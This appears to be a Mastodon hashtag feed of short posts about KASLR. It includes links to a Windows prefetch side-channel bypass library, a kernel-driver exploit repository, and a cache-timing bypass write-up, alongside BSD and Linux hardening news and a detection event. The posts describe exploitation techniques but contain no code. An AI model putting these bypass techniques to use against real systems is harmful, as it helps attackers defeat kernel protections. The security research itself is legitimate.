I created a library from prefetch-tool so you can more easily experiment with side-channel #KASLR bypasses on Windows:
https://github.com/v-p-b/prefetch-lib
For dogfooding I exploited HEVD on Windows 11 24H2:
https://github.com/v-p-b/HEVD-prefetch
#kASLR
Bypassing kASLR via Cache Timing
Explores a prefetch side-channel attack to bypass kASLR on Windows 11 by measuring cache access times to locate the kernel base address.
https://r0keb.github.io/posts/Bypassing-kASLR-via-Cache-Timing/
#Exploiting the #NT #Kernel in 24H2: New Bugs in Old Code & Side Channels Against #KASLR
@mdhughes @Reiddragon this is oversimplifying by A LOT. For instance: some desktop things work better on #OpenBSD than #FreeBSD. #NetBSD was the first #BSD to implement #KASLR - before OpenBSD. It's not black and white and hasn't been for years now yet everybody copies the same fake mantras about these 3 BSDs.
#Linux Will Stop Randomizing Per-CPU Entry Area When #KASLR Is Not Active
https://www.phoronix.com/news/Linux-Random-Per-CPU-Entry-ASLR
Original tweet : https://twitter.com/phoronix/status/1640020726924161024
A new ETW event, […] that could point at various suspicious behaviors of #KASLR bypasses
OpenBSD KARL: Für jeden Start ein neuer Kernel https://www.heise.de/ix/meldung/OpenBSD-KARL-Fuer-jeden-Start-ein-neuer-Kernel-3767821.html #ASLR #BSD #KARL #KASLR #LinuxundOpenSource #OpenSource #OpenBSD #Sicherheit
Client Info
Server: https://mastodon.social
Version: 2025.04
Repository: https://github.com/cyevgeniy/lmst